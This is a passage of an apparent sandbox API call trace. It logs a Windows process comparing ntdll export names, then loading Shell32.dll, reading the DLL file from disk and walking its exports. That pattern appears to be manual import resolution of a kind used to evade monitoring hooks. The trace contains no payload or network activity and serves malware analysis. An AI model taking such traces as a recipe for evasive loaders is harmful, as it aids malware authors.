[0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0178.470] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0178.470] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.471] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.471] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0178.472] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0178.472] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0178.473] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0178.473] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0178.474] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0178.474] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0178.475] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0182.724] GetProcessHeap () returned 0x590000 [0182.899] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c6040 | out: hHeap=0x590000) returned 1 [0182.911] GetProcessHeap () returned 0x590000 [0182.911] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a90c0 [0182.911] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0182.912] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0182.912] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0182.912] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0182.912] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0182.912] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0182.913] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0182.913] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0182.913] GetProcessHeap () returned 0x590000 [0182.913] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1587258) returned 0x40cb040 [0183.192] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0183.192] ReadFile (in: hFile=0x140, lpBuffer=0x40cb040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40cb040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0188.632] CloseHandle (hObject=0x140) returned 1 [0188.632] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0188.632] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0188.632] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0188.632] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0188.632] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0188.632] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0188.633] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0188.633] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0188.633] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.633] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0188.633] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0188.633] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0188.633] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.633] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0188.633] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0188.633] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0188.633] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0188.633] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.633] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0188.633] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.633] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0188.633] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0188.633] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0188.633] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.633] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0188.634] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0188.634] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.634] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0188.634] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0188.634] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0188.635] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0188.636] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0188.636] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0188.636] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0188.636] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0188.637] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", 